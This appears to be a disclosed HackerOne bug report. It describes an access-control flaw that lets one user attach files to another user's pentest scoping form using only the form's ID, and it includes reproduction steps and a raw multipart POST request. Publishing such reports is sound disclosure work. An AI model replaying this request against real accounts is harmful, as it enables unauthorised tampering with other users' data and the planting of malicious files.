Hillybot__H1:2450215HackerOne: Any user could upload attachments to pentest scoping form they don't have access to
7.1 High
AI Score
Confidence
Low
hello team
in my recent testing i found that any users could upload attachments to any users pentest scoping form without having access to it as long as they have the scope id.
note: before you start you will require two account to test for this bug.
steps to reproduce:
- create a sandbox
- go to pentest an start an pentest form
3.copy the pentest form id from the url - log in to your second account
- send the following request
==================================================================================================================
POST /attachments HTTP/2
Host: hackerone.com
Cookie: your cookies
-----------------------------22121373215470710503552942440
Content-Disposition: form-data; name=“tracer”
989953fa-5635-43c9-b584-48736d224b15
-----------------------------22121373215470710503552942440
Content-Disposition: form-data; name=“context_type”
PentestOpportunity
-----------------------------22121373215470710503552942440
Content-Disposition: form-data; name=“file”; filename=“does not have a option to change his own permission.png”
Content-Type: image/png
====================================================================================================================
6.from your previous account reload the scoping form and go to review and submit .
7. you will notice that the file have been successfully uploaded.
Impact
business logic error
could attach malicious files to anyones scoping form.
7.1 High
AI Score
Confidence
Low